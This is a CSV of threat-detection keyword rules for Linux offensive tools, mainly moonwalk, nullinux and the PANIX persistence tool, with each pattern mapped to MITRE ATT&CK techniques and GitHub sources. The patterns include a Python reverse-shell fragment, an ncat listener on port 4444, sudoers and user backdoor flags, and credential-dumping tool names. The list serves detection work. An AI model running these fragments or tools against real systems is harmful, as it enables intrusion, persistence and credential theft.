"*mimipenguin_*.tar.gz*",".{0,1000}mimipenguin_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3839","637","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z"
"* -o moonwalk*",".{0,1000}\s\-o\smoonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*/.MOONWALK*",".{0,1000}\/\.MOONWALK.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*/log_file_timestamps.json*",".{0,1000}\/log_file_timestamps\.json.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*/moonwalk.git*",".{0,1000}\/moonwalk\.git.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*/moonwalk_darwin*",".{0,1000}\/moonwalk_darwin.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*/v1.0.0/moonwalk_linux*",".{0,1000}\/v1\.0\.0\/moonwalk_linux.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8*",".{0,1000}4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd*",".{0,1000}62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836*",".{0,1000}90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*import check_sudoers_misconfigurations*",".{0,1000}import\scheck_sudoers_misconfigurations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*subprocess.call([""""/bin/sh*",".{0,1000}import\ssocket,subprocess,os\;s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}subprocess\.call\(\[\""\/bin\/sh.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","106","50","2024-09-29T18:27:05Z","2022-07-15T05:51:04Z"
"*clear_me_from_history()?*",".{0,1000}clear_me_from_history\(\)\?.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*Finish moonwalk and clear your traces*",".{0,1000}Finish\smoonwalk\sand\sclear\syour\straces.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*moonwalk finish*",".{0,1000}moonwalk\sfinish.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*moonwalk get *history*",".{0,1000}moonwalk\sget\s.{0,1000}history.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*moonwalk start*",".{0,1000}moonwalk\sstart.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*mufeedvh/moonwalk*",".{0,1000}mufeedvh\/moonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","1","#linux","N/A","10","10","1364","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z"
"*/var/lib/ptunnel*",".{0,1000}\/var\/lib\/ptunnel.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001  -  T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","#linux","N/A","8","5","421","70","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z"
"*Replacing /etc/dhcp/dhcpd.conf with no route push config*",".{0,1000}Replacing\s\/etc\/dhcp\/dhcpd\.conf\swith\sno\sroute\spush\sconfig.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","127","14","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z"
"*sudo ./startup.sh*",".{0,1000}sudo\s\.\/startup\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#linux","N/A","9","2","127","14","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z"
"*ncat * -p 4444*",".{0,1000}ncat\s.{0,1000}\s\-p\s4444.{0,1000}","greyware_tool_keyword","ncat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0011","N/A","Calypso - GALLIUM","C2","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*netsniff-ng*",".{0,1000}netsniff\-ng.{0,1000}","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.","T1040  -  T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* nullinux.py*",".{0,1000}\snullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*/nullinux.git*",".{0,1000}\/nullinux\.git.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*/nullinux.py*",".{0,1000}\/nullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*/nullinux_users.txt*",".{0,1000}\/nullinux_users\.txt.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*] Starting nullinux setup script*",".{0,1000}\]\sStarting\snullinux\ssetup\sscript.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623*",".{0,1000}e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#filehash #linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*enum_enumdomusers(*",".{0,1000}enum_enumdomusers\(.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*m8sec/nullinux*",".{0,1000}m8sec\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*nullinux -rid -range *",".{0,1000}nullinux\s\-rid\s\-range\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*nullinux -shares -U *",".{0,1000}nullinux\s\-shares\s\-U\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*nullinux -users *",".{0,1000}nullinux\s\-users\s.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","568","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z"
"*One-Lin3r*",".{0,1000}One\-Lin3r.{0,1000}","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/D4Vinci/One-Lin3r","1","1","#linux","N/A","N/A","10","1678","291","2024-10-14T19:18:37Z","2018-01-14T21:26:04Z"
"* --backdoor-user *",".{0,1000}\s\-\-backdoor\-user\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"* --malicious-package *",".{0,1000}\s\-\-malicious\-package\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"* --sudoers-backdoor*",".{0,1000}\s\-\-sudoers\-backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/lib/systemd/system/evil.service*",".{0,1000}\/lib\/systemd\/system\/evil\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/PANIX.git*",".{0,1000}\/PANIX\.git.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/releases/download/panix-v*/panix.sh*",".{0,1000}\/releases\/download\/panix\-v.{0,1000}\/panix\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[-] Failed to create sudoers backdoor for user *",".{0,1000}\[\-\]\sFailed\sto\screate\ssudoers\sbackdoor\sfor\suser\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] $bin backdoored successful*",".{0,1000}\[\+\]\s\$bin\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] $binary backdoored successful*",".{0,1000}\[\+\]\s\$binary\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] APT persistence establis*",".{0,1000}\[\+\]\sAPT\spersistence\sestablis.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] At job persistence establish*",".{0,1000}\[\+\]\sAt\sjob\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Authorized_keys persistence establish*",".{0,1000}\[\+\]\sAuthorized_keys\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Backdoor user persistence establish*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Backdoor user persistence established!*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Bind shell persistence establish*",".{0,1000}\[\+\]\sBind\sshell\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Capabilities backdoor persistence establish*",".{0,1000}\[\+\]\sCapabilities\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Created malicious pre-commit hook in *",".{0,1000}\[\+\]\sCreated\smalicious\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Cron persistence established*",".{0,1000}\[\+\]\sCron\spersistence\sestablished.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Docker container persistence establish*",".{0,1000}\[\+\]\sDocker\scontainer\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Git persistence establish*",".{0,1000}\[\+\]\sGit\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] init.d backdoor establish*",".{0,1000}\[\+\]\sinit\.d\sbackdoor\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] MOTD backdoor persistence establish*",".{0,1000}\[\+\]\sMOTD\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] Removed malicious entry from pre-commit hook in *",".{0,1000}\[\+\]\sRemoved\smalicious\sentry\sfrom\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] SSH key persistence established!*",".{0,1000}\[\+\]\sSSH\skey\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
